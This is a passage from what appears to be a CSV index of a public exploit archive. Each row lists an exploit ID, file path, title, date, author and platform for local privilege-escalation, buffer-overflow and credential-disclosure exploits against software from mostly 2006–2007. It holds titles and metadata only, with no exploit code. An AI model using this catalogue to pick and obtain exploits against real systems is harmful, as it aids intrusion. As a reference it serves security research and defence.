Workshop - '.hhp' Local Buffer Overflow (1)",2006-02-06,bratax,windows,local, -1479,exploits/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local, -1481,exploits/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation",2006-02-08,kokanin,qnx,local, -1490,exploits/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)",2006-02-11,k3xji,windows,local, -1495,exploits/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)",2006-02-14,darkeagle,windows,local, -1518,exploits/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)",2006-02-20,"Marco Ivaldi",linux,local, -1534,exploits/sco/local/1534.c,"SCO Unixware 7.1.3 - 'ptrace' Local Privilege Escalation",2006-02-26,prdelka,sco,local, -1545,exploits/osx/local/1545.pl,"Apple Mac OSX - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local, -40340,exploits/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,windows,local, -1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local, -1555,exploits/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Local Buffer Overflow",2006-03-05,Kozan,windows,local, -1577,exploits/irix/local/1577.sh,"SGI IRIX 6.5.28 - 'runpriv' Design Error",2005-10-10,anonymous,irix,local, -1579,exploits/linux/local/1579.pl,"Ubuntu 5.10 Installer - Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local, -1584,exploits/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local, -1591,exploits/linux/local/1591.py,"Python 2.4.2 - 'realpath()' Local Stack Overflow",2006-03-18,"Gotfault Security",linux,local, -1596,exploits/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation",2006-03-20,"H D Moore",linux,local, -1624,exploits/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) - rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local, -1625,exploits/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) - edauth NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local, -1719,exploits/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL",2006-04-26,N1V1Hd,multiple,local, -1772,exploits/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory",2006-05-09,"Ruben Santamarta",windows,local, -1806,exploits/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local, -40336,exploits/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local, -1831,exploits/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local, -1910,exploits/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local, -1911,exploits/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local, -1917,exploits/windows/local/1917.pl,"Pico Zip 4.01 - 'Filename' Local Buffer Overflow",2006-06-15,c0rrupt,windows,local, -1924,exploits/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local, -1944,exploits/windows/local/1944.c,"Microsoft Excel - Remote Code Execution",2006-06-22,"naveed afzal",windows,local, -1958,exploits/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack Buffer Overflow (SEH)",2006-06-27,FistFuXXer,windows,local, -1962,exploits/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",osx,local, -1973,exploits/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",osx,local, -1978,exploits/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",windows,local, -1985,exploits/windows/local/1985.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow",2006-07-05,muts,windows,local, -1986,exploits/windows/local/1986.cpp,"Microsoft Excel 2000/2003 (French) - Hlink Local Buffer Overflow",2006-07-06,NSRocket,windows,local, -1988,exploits/windows/local/1988.pl,"Microsoft Excel 2003 (Italian) - Hlink Local Buffer Overflow",2006-07-06,oveRet,windows,local, -1992,exploits/windows/local/1992.py,"WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow",2006-07-07,"Jerome Athias",windows,local, -1999,exploits/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)",2006-07-09,"SYS 49152",windows,local, -2004,exploits/linux/local/2004.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local, -2005,exploits/linux/local/2005.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local, -2006,exploits/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local, -2011,exploits/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)",2006-07-14,Sunay,linux,local, -2013,exploits/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation",2006-07-15,h00lyshit,linux,local, -2015,exploits/linux/local/2015.py,"Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local, -2016,exploits/linux/local/2016.sh,"Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local, -2031,exploits/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local, -2056,exploits/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local, -2065,exploits/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local, -2067,exploits/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,solaris,local, -2091,exploits/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution",2006-07-30,NSRocket,windows,local, -2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",windows,local, -2106,exploits/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local, -2107,exploits/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local, -2108,exploits/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local, -2111,exploits/osx/local/2111.pl,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)",2006-08-02,"Kevin Finisterre",osx,local, -2144,exploits/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - 'DEBUG_FILE' Local Privilege Escalation",2006-08-08,"Karol Wiesek",linux,local, -2152,exploits/php/local/2152.php,"PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC)",2006-08-08,Heintz,php,local, -2193,exploits/linux/local/2193.php,"PHP 4.4.3/5.1.4 - 'sscanf' Local Buffer Overflow",2006-08-16,Andi,linux,local, -2241,exploits/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)",2006-08-22,"Marco Ivaldi",solaris,local, -2242,exploits/solaris/local/2242.sh,"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak",2006-08-22,"Marco Ivaldi",solaris,local, -2264,exploits/windows/local/2264.html,"VMware 5.5.1 - 'ActiveX' Local Buffer Overflow",2006-08-27,c0ntex,windows,local, -2278,exploits/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local, -2284,exploits/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor",2006-09-01,"Andres Tarasco",windows,local, -2286,exploits/windows/local/2286.cpp,"PowerZip 7.06.38950 - 'Filename Handling' Local Buffer Overflow",2006-09-01,bratax,windows,local, -2330,exploits/solaris/local/2330.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local, -2331,exploits/solaris/local/2331.c,"X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local, -2332,exploits/sco/local/2332.c,"X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local, -2338,exploits/linux/local/2338.c,"openmovieeditor 0.0.20060901 - 'name' Local Buffer Overflow",2006-09-09,Qnix,linux,local, -2360,exploits/solaris/local/2360.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)",2006-09-13,"Marco Ivaldi",solaris,local, -2404,exploits/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - LHA long Directory name Local Overflow",2006-09-20,Guay-Leroux,linux,local, -2412,exploits/windows/local/2412.c,"Microsoft Windows Kernel - Local Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local, -2463,exploits/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local, -2464,exploits/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local, -2466,exploits/linux/local/2466.pl,"cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation",2006-10-01,"Clint Torrez",linux,local, -2492,exploits/linux/local/2492.s,".ELF Binaries - Local Privilege Escalation",2006-10-08,Sha0,linux,local, -2543,exploits/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local, -2565,exploits/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Local Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local, -2569,exploits/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local, -2580,exploits/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local, -2581,exploits/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local, -2633,exploits/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,hp-ux,local, -2634,exploits/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,hp-ux,local, -2635,exploits/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local, -2636,exploits/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,hp-ux,local, -2641,exploits/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local, -2676,exploits/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation",2006-10-29,Nanika,windows,local, -2737,exploits/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local, -2738,exploits/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local, -2788,exploits/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Local Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local, -40380,exploits/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local, -2815,exploits/windows/local/2815.c,"XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local, -2821,exploits/windows/local/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local, -2824,exploits/windows/local/2824.c,"XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local, -2872,exploits/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local, -2873,exploits/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Local Buffer Overflow",2006-11-30,"Greg Linares",windows,local, -2880,exploits/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local, -2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local, -3024,exploits/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local, -3070,exploits/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String",2007-01-02,MoAB,osx,local, -3071,exploits/windows/local/3071.c,"Microsoft Vista - 'NtRaiseHardError' Local Privilege Escalation",2007-01-03,erasmus,windows,local, -3087,exploits/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local, -3088,exploits/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation",2007-01-05,MoAB,osx,local, -3094,exploits/bsd/local/3094.c,"OpenBSD 3.x < 4.0 - 'vga_ioctl()' Local Privilege Escalation",2007-01-07,"Critical Security",bsd,local, -3102,exploits/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Local Privilege Escalation",2007-01-08,MoAB,osx,local, -3131,exploits/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Local Privilege Escalation",2007-01-15,MaD,windows,local, -3149,exploits/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow",2007-01-17,porkythepig,windows,local, -3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,linux,local, -3156,exploits/osx/local/3156.rb,"Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST (PoC)",2007-01-19,MoAB,osx,local, -3159,exploits/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow",2007-01-19,porkythepig,windows,local, -3173,exploits/osx/local/3173.rb,"Apple Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local, -3176,exploits/windows/local/3176.cpp,"Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow",2007-01-22,porkythepig,windows,local, -3177,exploits/multiple/local/3177.txt,"Oracle 10g - SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local, -3178,exploits/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local, -3179,exploits/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local, -3181,exploits/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation",2007-01-23,MoAB,osx,local, -3213,exploits/linux/local/3213.c,"Trend Micro VirusWall 3.81 - 'vscan/VSAPI' Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",linux,local, -3219,exploits/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation",2007-01-29,MoAB,osx,local, -3220,exploits/windows/local/3220.c,"Multiple Printer Providers (Spooler Service) - Local Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local, -3260,exploits/windows/local/3260.txt,"Microsoft Word 2000 - Code Execution",2007-02-03,xCuter,windows,local, -3273,exploits/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak",2007-02-06,bunker,tru64,local, -3330,exploits/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local, -3333,exploits/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local, -3342,exploits/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local, -3349,exploits/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local, -3356,exploits/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation",2007-02-21,"Jon Hart",linux,local, -3369,exploits/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",windows,local, -3383,exploits/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Privilege Escalation",2007-02-28,"Don Bailey",plan9,local, -3384,exploits/linux/local/3384.c,"Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local, -3386,exploits/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local, -3413,exploits/multiple/local/3413.php,"PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local, -3414,exploits/multiple/local/3414.php,"PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local, -3417,exploits/windows/local/3417.php,"PHP 4.4.6 - 'mssql_[p]connect()' Local Buffer Overflow",2007-03-05,rgod,windows,local, -3424,exploits/multiple/local/3424.php,"PHP 5.2.1 - 'substr_compare()' Information Leak",2007-03-07,"Stefan Esser",multiple,local, -3426,exploits/linux/local/3426.php,"PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution",2007-03-07,"Stefan Esser",linux,local, -3427,exploits/linux/local/3427.php,"PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local, -3429,exploits/windows/local/3429.php,"PHP 'COM' Extensions - inconsistent Win32 'safe_mode' Bypass",2007-03-07,anonymous,windows,local, -3431,exploits/windows/local/3431.php,"PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local, -3439,exploits/windows/local/3439.php,"PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local, -3440,exploits/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local, -3442,exploits/multiple/local/3442.php,"PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local, -3451,exploits/win_x86/local/3451.c,"Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation",2007-03-10,"Cesar Cerrudo",win_x86,local, -3460,exploits/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow",2007-03-12,"Stefan Esser",osx,local, -3479,exploits/linux/local/3479.php,"PHP 5.2.1 - 'session_regenerate_id()' Double-Free",2007-03-14,"Stefan Esser",linux,local, -3480,exploits/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free",2007-03-14,"Stefan Esser",linux,local, -3488,exploits/windows/local/3488.php,"PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow",2007-03-15,rgod,windows,local, -3499,exploits/linux/local/3499.php,"PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Overflow",2007-03-16,"Stefan Esser",linux,local, -3517,exploits/osx/local/3517.php,"PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow",2007-03-19,"Stefan Esser",osx,local, -3525,exploits/linux/local/3525.php,"PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage",2007-03-20,"Stefan Esser",linux,local, -3529,exploits/linux/local/3529.php,"PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage",2007-03-20,"Stefan Esser",linux,local, -3559,exploits/multiple/local/3559.php,"PHP 5.2.1 - 'Unserialize()' Local Information Leak",2007-03-23,"Stefan Esser",multiple,local, -3571,exploits/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow",2007-03-25,"Stefan Esser",linux,local, -3572,exploits/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local, -3576,exploits/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local, -3578,exploits/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation",2007-03-26,harry,bsd,local, -3587,exploits/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",linux,local, -3593,exploits/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local, -3595,exploits/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",linux,local, -3617,exploits/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow",2007-03-31,devcode,windows,local, -3647,exploits/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local, -3648,exploits/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local, -3649,exploits/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local, -3652,exploits/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)",2007-04-03,devcode,windows,local, -3664,exploits/windows/local/3664.txt,"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation",2007-04-04,"Marco Ivaldi",windows,local, -3688,exploits/windows/local/3688.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local, -3692,exploits/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local, -3695,exploits/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local, -3727,exploits/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,windows,local, -3730,exploits/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow",2007-04-13,Xpl017Elz,linux,local, -3755,exploits/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local, -3757,exploits/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local, -3772,exploits/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local, -3776,exploits/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local, -3777,exploits/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local, -3779,exploits/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Local Buffer Overflow",2007-04-23,Marsu,windows,local, -3793,exploits/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - '.bmp' Local Buffer Overflow",2007-04-24,Marsu,windows,local, -3797,exploits/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Local Buffer Overflow",2007-04-25,Marsu,windows,local, -3798,exploits/windows/local/3798.c,"FreshView 7.15 - '.psp' Local Buffer Overflow",2007-04-25,Marsu,windows,local, -3801,exploits/windows/local/3801.c,"GIMP 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,windows,local, -3811,exploits/windows/local/3811.c,"IrfanView 4.00 - '.iff' Local Buffer Overflow",2007-04-27,Marsu,windows,local, -3812,exploits/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Local Buffer Overflow",2007-04-27,Marsu,windows,local, -3823,exploits/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local, -3856,exploits/windows/local/3856.html,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local, -3888,exploits/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local, -3897,exploits/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Escalation",2007-05-11,binagres,windows,local, -3912,exploits/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local, -3975,exploits/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local, -3985,exploits/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local, -4001,exploits/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local, -4002,exploits/windows/local/4002.py,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)",2007-05-28,"Thomas Pollet",windows,local, -4013,exploits/osx/local/4013.txt,"Apple Mac OSX < 2007-005 - 'vpnd' Local Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local, -4024,exploits/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local, -4028,exploits/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local, -4051,exploits/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local, -4080,exploits/windows/local/4080.php,"PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow",2007-06-19,rgod,windows,local, -40465,exploits/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local, -4165,exploits/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local, -4172,exploits/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local, -4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local, -4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,multiple,local, -4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,windows,local, -4218,exploits/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,windows,local, -4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local, -4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - 